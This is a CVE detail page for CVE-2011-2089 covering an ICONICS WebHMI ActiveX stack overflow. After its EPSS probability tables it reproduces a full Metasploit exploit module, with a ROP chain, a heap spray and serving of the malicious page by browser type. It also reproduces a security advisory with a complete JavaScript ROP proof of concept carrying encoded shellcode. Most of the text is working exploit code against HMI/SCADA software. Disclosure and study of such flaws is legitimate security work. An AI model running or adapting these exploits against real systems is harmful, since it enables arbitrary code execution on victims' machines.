CVE-2011-2089 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	79.66%	–	–
2022-04-17	–	–	78.71%	–	–
2022-07-03	–	–	78.1%	–	–
2023-03-12	–	–	–	48.73%	–
2023-04-09	–	–	–	46.63%	–
2023-07-30	–	–	–	44.67%	–
2023-11-12	–	–	–	46.6%	–
2024-01-07	–	–	–	43.64%	–
2024-02-25	–	–	–	50.75%	–
2024-06-02	–	–	–	50.75%	–
2024-06-02	–	–	–	50.75%	–
2024-12-22	–	–	–	48.46%	–
2025-01-05	–	–	–	51.38%	–
2025-01-19	–	–	–	51.38%	–
2025-03-18	–	–	–	–	63.53%
2025-03-30	–	–	–	–	70.68%
2025-03-30	–	–	–	–	70.68,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2022-04-17	99%
2022-07-03	99%
2023-03-12	97%
2023-04-09	97%
2023-07-30	97%
2023-11-12	97%
2024-01-07	97%
2024-02-25	97%
2024-06-02	98%
2024-06-02	98%
2024-12-22	98%
2025-01-05	98%
2025-01-19	98%
2025-03-18	98%
2025-03-30	99%
2025-03-30	99%

## # $Id: iconics_webhmi_setactivexguid.rb 12584 2011-05-11 20:45:54Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "ICONICS WebHMI ActiveX Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control. By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll fails to do any proper bounds checking before this input is copied onto the stack, which causes a buffer overflow, and results arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Version' => "$Revision: 12584 $", 'Author' => [ 'Scoot Bell <scott.bell[at]security-assessment.com>', 'Blair Strang <blair.strang[at]security-assessment.com>', 'sinn3r', #Metasploit port ], 'References' => [ ['OSVDB', '72135'], ['URL', 'http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf'], ['URL', 'http://www.exploit-db.com/exploits/17240/'], ], 'Payload' => { 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'ExitFunction' => "seh", 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 6/7/8 on Windows XP SP3', { 'Offset' => 510, #Offset to where ROP gadgets begin 'Ret' => 0x770167b0, #PUSH ESP; POP EBP; RETN 8 'Max' => 4500, #Max buffer size used }, ], [ 'IE 7 on Windows Vista', { 'Ret' => 0x0c0c0c0c, #Target spray 'blockSize' => "0x1000", 'spraySize' => "0x8500", 'Max' => 4500, }, ], ], 'Privileged' => false, 'DisclosureDate' => "May 5 2011", 'DefaultTarget' => 0)) end def junk return rand_text(4).unpack("L")[0].to_i end def repeat(addr, rep) arr = [] rep.times { arr << addr } return arr end def on_request_uri(cli, request) my_target = '' agent = request.headers['User-Agent'] if agent =~ /NT 5\.1/ and agent =~ /MSIE (6|7)\.\d/ my_target = targets[2] elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.\d/ my_target = targets[2] elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ my_target = targets[1] else send_not_found(cli) print_error("#{cli.peerhost}:#{cli.peerport} Unknown User-Agent") return end js = '' sploit = '' if my_target['spraySize'] == nil #ROP tekniq is only used against IE 8 + XP SP3 (ENG), since the gadgets are specific #to the service pack (non or fully patched) rop_gadgets = [ my_target.ret, junk, 0x7e45c67f, #XCHG EAX,EBP; RETN (USER32.dll) repeat(junk, 2), 0x7e440639, #ADD ESP,10; POP EDI; POP ESI; POP EBX; RETN USER32.dll 0x7c801ad4, #Kernel32.VirtualProtect junk, #Initial ESP + 8 p1 = retaddr junk, #p2 - lpaddr junk, #p3 - size junk, #p4 - perms junk, #p5 - oldperms junk, #Return address 0x7e4462ed, #XCHG EAX,ECX; RETN (USER32.dll) 0x7c902b50, #MOV EDX, ECX; RETN (ntdll.dll) repeat(0x77aa2d96, 20), #INC ECX * 21 (CRYPT32.dll) 0x7c901726, #MOV EAX, EDX; RETN (ntdll.dll) repeat(0x5b86a17b, 2), #ADD EAX,7B; RETN * 2 (NETAPI32.dll) repeat(0x77c34fbd, 2), #ADD EAX,5C; RETN * 2 (msvcrt.dll) 0x7E76EA74, #MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll) #Shellcode pointer repeat(0x77aa2d96, 4), #INC ECX * 4 (CRYPT32.dll) 0x7E76EA74, #MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll) #Size (0x400 bytes) repeat(0x77aa2d96, 4), #INC ECX * 4 (CRYPT32.dll) 0x7e721a99, #POP EAX; RETN (SXS.dll) 0x3BFFF9CB, #Value to XOR 0x7e7560b5, #XOR EAX,3bfffdcb (SXS.dll) 0x7E76EA74, #MOV DWORD PTR DS:[ECX],EAX; RETN (RPCRT4.dll) #NewProtect repeat(0x77aa2d96, 4), #INC ECX * 4 (CRYPT32.dll) 0x7E456160, #XOR EAX,EAX; RETN (USER32.dll) 0x7E4193BA, #ADD AL,3B (USER32.dll) repeat(0x7E442074, 5), #INC EAX; RETN (USER32.dll) 0x7E76EA74, #MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll) #OldProtect repeat(0x77aa2d96, 4), #INC ECX * 4 (CRYPT32.dll) 0x7e721a99, #POP EAX (SXS.dll) 0x10010570, #EAX (Wriable memory) 0x7E76EA74, #MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll) #Call VirtualProtect repeat(0x7E421AAF, 20), #DEC ECX; RETN (USER32.dll) 0x7E4462ED, #XCHG EAX,ECX; RETN (USER32.dll) 0x7E45F257, #XCHG EAX,ESP; RETN (USER32.dll) repeat(junk, 2), #Align shellcode ].flatten.pack('V*') sploit << Rex::Text.to_unescape(rand_text_alpha(my_target['Offset']), Rex::Arch.endian(target.arch)) sploit << Rex::Text.to_unescape(rop_gadgets, Rex::Arch.endian(target.arch)) sploit << Rex::Text.to_unescape(make_nops(80), Rex::Arch.endian(target.arch)) sploit << Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) sploit << rand_text_alpha(my_target['Max']-sploit.length) else #If we don't have to ROP, then we just spray against the rest of the targets shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) target_ret = [my_target.ret].pack('V') nops = Rex::Text.to_unescape(target_ret*4, Rex::Arch.endian(target.arch)) sploit << Rex::Text.to_unescape(target_ret * (my_target['Max'] / 4), Rex::Arch.endian(target.arch)) js_func_name = rand_text_alpha(rand(6) + 3) js_var_blocks_name = rand_text_alpha(rand(6) + 3) js_var_shell_name = rand_text_alpha(rand(6) + 3) js_var_nopsled_name = rand_text_alpha(rand(6) + 3) js_var_index_name = rand_text_alpha(rand(6) + 3) js = <<-EOS <script> function #{js_func_name}() { var #{js_var_blocks_name} = new Array(); var #{js_var_shell_name} = unescape("#{shellcode}"); var #{js_var_nopsled_name} = unescape("#{nops}"); while (#{js_var_nopsled_name}.length < #{my_target['blockSize']}) { #{js_var_nopsled_name} += #{js_var_nopsled_name} }; for (var #{js_var_index_name}=0; #{js_var_index_name} < #{my_target['spraySize']}; #{js_var_index_name}++) { #{js_var_blocks_name}[#{js_var_index_name}] = [ "" + #{js_var_nopsled_name} + #{js_var_shell_name} ].join(""); } } #{js_func_name}(); </script> EOS end obj_id = rand_text_alpha(rand(6) + 3) sploit_name = rand_text_alpha(rand(6) + 3) html = <<-EOS <html> <head>#{js}</head> <body> <object classid="clsid:D25FCAFC-F795-4609-89BB-5F78B4ACAF2C" id="#{obj_id}"></object> <script> var #{sploit_name} = unescape("#{sploit}"); #{obj_id}.SetActiveXGUID(#{sploit_name}); </script> </body> </html> EOS html = html.gsub(/^\t\t/, "") print_status("Sending malicious page to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end

( , ) (, . `.' ) ('. ', ). , ('. ( ) ( (_,) .`), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _='`"``=. presents.. ICONICS WebHMI ActiveX Stack Overflow Vendor Link: http://www.iconics.com/ PDF: http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf +-----------+ |Description| +-----------+ ICONICS Genesis32 is a suite of OPC, SNMP, BACnet and Web-enabled HMI and SCADA applications. A stack overflow was found in an ActiveX control required by the WebHMI interface. This condition can be used to gain command execution. The affected control is 'GenVersion.dll' and has the ClassID of {CEFF5F48-BD2E-4D10-BAE5-AF729975E223}. This control is marked safe for scripting. +------------+ |Exploitation| +------------+ Exploitation of this vulnerability requires a user with the ActiveX control installed to visit a page containing specially crafted JavaScript. Users can generally be lured to visit web pages via email, instant message or links on the internet. By passing a specially crafted string to the "SetActiveXGUID" method, it is possible to overflow a static buffer and execute arbitrary code on the user's machine with the privileges of the logged on user. Security-Assessment.com constructed a JavaScript ROP exploit as proof of concept. +----------------------------+ |Proof of Concept ROP Exploit| +----------------------------+ <html> <!-- ( , ) (, . `.' ) ('. ', ). , ('. ( ) ( (_,) .`), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _='`"``=. presents.. PRODUCT: http://www.iconics.com/Home/Products/HMI-and-SCADA/GENESIS32.aspx AUTHOR: sgb <scott.bell@security-assessment.com> AUTHOR: bls <blair.strang@security-assessment.com> WEBSITE: http://www.security-assessment.com/ TESTED: Windows XP Professional SP3 (EN) latest updates with IE8 and IE7 DATE: Sun Jan 30 2011 --> <title>ICONICS WEBHMI ACTIVEX BOF ROP XPSP3</title> <object classid="clsid:D25FCAFC-F795-4609-89BB-5F78B4ACAF2C" id="target"></object> <script language="JavaScript"> //---------------------------------------------------- // Javascript helpers //---------------------------------------------------- String.prototype.repeat = function(num) { return new Array(isNaN(num)? 1 : ++num).join(this); } function encode_dword(sdw) { if(sdw.length != 8) { alert('encode_dword: invalid dword: ' + sdw); return ""; } var a = sdw.substr(0, 4); var b = sdw.substr(4, 8); return unescape('%u' + b + '%u' + a); } function junk_dword(char) { var charCodeStr = char.charCodeAt(0).toString(16); var expr = charCodeStr.repeat(4) return encode_dword(expr); } //---------------------------------------------------- // Shellcode // // use payload/windows/exec // set CMD 'cmd.exe /q /k taskkill /f /IM iexplore.exe' // generate -t js_le -b '\x00' //---------------------------------------------------- var shellcode = unescape('%u9090').repeat(200) + unescape( '%ueaba%ud0be%udba1%ud9de%u2474%u5df4%uc933%u3bb1' + '%u5531%u8314%ufced%u5503%u0810%u2c4b%u4549%ucdb4' + '%u358a%u283c%u67bb%u385a%ub7ee%u6c28%u3c03%u857c' + '%u3090%uaaa9%ufe11%u858f%ucfa2%u490f%u4e60%u90ec' + '%ub0b5%u5acd%ub1c8%u860a%ue323%uccc3%u1396%u9067' + '%u122a%u9ea7%u6c13%u61c2%uc6e7%ub1cd%u5d58%u2985' + '%u39d2%u4b36%u5a37%u020a%ua83c%u95f8%ue194%ua401' + '%uadd8%u083f%uacd5%uaf78%udb06%ud372%udbbb%ua940' + '%u6e67%u0955%uc8e3%uabbd%u8e20%ua736%uc58d%ua411' + '%u0a10%ud02a%uad99%u50fd%u89d9%u39d9%ub0b9%ue478' + '%ucd6c%u409b%u6bd0%u63d7%u0d05%ue9ba%u9cd8%u57c0' + '%u9eda%uf7ca%uafb3%u9841%u30c4%udc80%ud32b%u2901' + '%u4dc4%u90c0%u6e89%ud63e%uecb7%ua7cb%uec43%ua2b9' + '%uab08%udf52%u5901%u4c55%u4821%u1f36%u5cb9%ua7dc' + '%u8024%u0931%uef87%u8926%u8eb3%ua2cb%u3950%u5940' + '%u9687%u81fe%ua1e8%ue1b3%u549f%u9234%uf933%u37b6' + '%u60e2%udd4f%u41fa'); //---------------------------------------------------- // ROP Gadgets // // Modules used: kernel32, user32, shell32, rpcrt4, ole32 //---------------------------------------------------- // Saves ESP into EAX var save_esp_gadget = encode_dword("77EEDC67") + // # DEC EAX # PUSH ESP # POP EBP # RETN 4 junk_dword("X") + encode_dword("7CB09A4D") + // # XCHG EAX,EBP # RETN junk_dword("Y"); // This will inc ESP by 16 + 4 + 4 + 4 = 28 bytes var jump_over_params_gadget = encode_dword('7C80DFD8'); // # ADD ESP,10 # POP EDI # POP ESI # POP EBX # RETN var virtual_protect_call = encode_dword('7c801ad4'); // &Kernel32.VirtualProtect // 5 parameter placeholders and 1 static var placeholders = junk_dword('P') + // PPPP 8 == INITIAL ESP + 8 p1 - retaddr (shellcode) junk_dword('Q') + // QQQQ 12 p2 - lpaddr (shellcode) junk_dword('R') + // RRRR 16 p3 - size junk_dword('S') + // SSSS 20 p4 - perms junk_dword('T'); // TTTT 24 p5 - oldperms var extra_junk = junk_dword('Y'); // JUNK (because jump gadget skips 28 bytes) var copy_eax_edx = encode_dword('7CB1B102'); // # MOV EDX,EAX # MOV EAX,EDX # RETN var copy_eax_ecx = encode_dword('7e419167'); // # XCHG EAX,ECX # RETN // ^ Note: destroys EAX var xchg_eax_edx = encode_dword('7CBB9C74'); // # XCHG EAX,EDX # RETN var inc_ecx = encode_dword('775F0CFF'); // # INC ECX # RETN var add_eax_64h = encode_dword('77550F6F'); // # ADD EAX,64 # RETN var add_eax_328h = encode_dword('7756DF51'); // # ADD EAX,328 # RETN var clear_eax = encode_dword('7E456160'); // # XOR EAX,EAX # RETN var dec_ecx = encode_dword('7CAA881F'); // # DEC ECX # RETN var pop_eax = encode_dword('7CB1B822'); // # POP EAX # RETN var xchg_eax_ecx = encode_dword('7E4462ED'); // # XCHG EAX,ECX # RETN var xchg_eax_esp = encode_dword('7CB93033'); // # XCHG EAX,ESP # RETN var restore_eax_from_edx = xchg_eax_edx + copy_eax_edx; var set_eax_40h = clear_eax + encode_dword('77550F6F').repeat(2) + // +64h x 2 - # ADD EAX,64 # RETN encode_dword('7CA7BC50').repeat(2) + // -41h x 2 - # SUB EAX,41 # RETN encode_dword('7C812FA6').repeat(6); // -1 x 6 - # DEC EAX # RETN // Copy contents of EDX to location pointed to by ECX (used to write our params) var write_arg = encode_dword('77EB2BE3'); // # MOV DWORD PTR DS:[ECX],EDX # RETN var sploit = unescape('%u9090').repeat(255) + // Padding for BOF save_esp_gadget + // Save ESP into EAX jump_over_params_gadget + // Jump over VirtualProtect params virtual_protect_call + placeholders + extra_junk + copy_eax_edx + // Prep EDX copy_eax_ecx + // Prep ECX inc_ecx.repeat(21) + // Point ECX at param 1 (retaddr) restore_eax_from_edx + // EAX was destroyed by copy_eax_ecx gadget :/ add_eax_64h.repeat(5) + // Bump EAX 'til it points to our shellcode copy_eax_edx + // Copy it into EDX in prep for write write_arg + // Write EDX (shellcode ptr) to [ECX] // retaddr for VirtualProtect which is our shellcode inc_ecx.repeat(4) + write_arg + // Write EDX again (shellcode ptr) for param 1: lpaddr inc_ecx.repeat(4) + // Bump ECX by 4 (so that it points at param 2) clear_eax + // Zero out EAX register add_eax_328h + // Bump up EAX by 600 to allow 600 bytes shellcode copy_eax_edx + // Write EAX to EDX in prep for param write_arg + // Write EDX (size) to ECX (points to param 3: dwsize) inc_ecx.repeat(4) + // Bump ECX by 4 (so that it points at param 3) set_eax_40h + // Set EAX to 0x40 (PAGE_EXECUTE_READWRITE) copy_eax_edx + // Copy EAX to EDX in prep for param write write_arg + inc_ecx.repeat(4) + // Bump ECX by 4 (so that it points at param 4) pop_eax + encode_dword('0012f878') + // Get a static, writable address into EAX // Note: if you get ERROR_NOACCESS on VirtualProtect then you probably have // to pick a different static, writeable address. copy_eax_edx + write_arg + // Put our static, writable address in param 5 dec_ecx.repeat(20) + // Roll ECX back to point to our VirtualProtect call xchg_eax_ecx + // Put ECX into EAX xchg_eax_esp + // Put EAX into ESP (RET will trigger VirtualProtect) junk_dword('Q') + // If we hit this, we failed... shellcode; //---------------------------------------------------- // Trigger //---------------------------------------------------- target.SetActiveXGUID(sploit); </script> </html> +--------+ |Solution| +--------+ ICONICS validated this security issue and updated the WebHMI software product to address this issue. The fix is incorporated in the version 9.22 releases of GENESIS32, GENESIS64 and BizViz. Security-Assessment.com recommends updating to the latest version provided by the vendor. +-----------------------------+ |About Security-Assessment.com| +-----------------------------+ Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.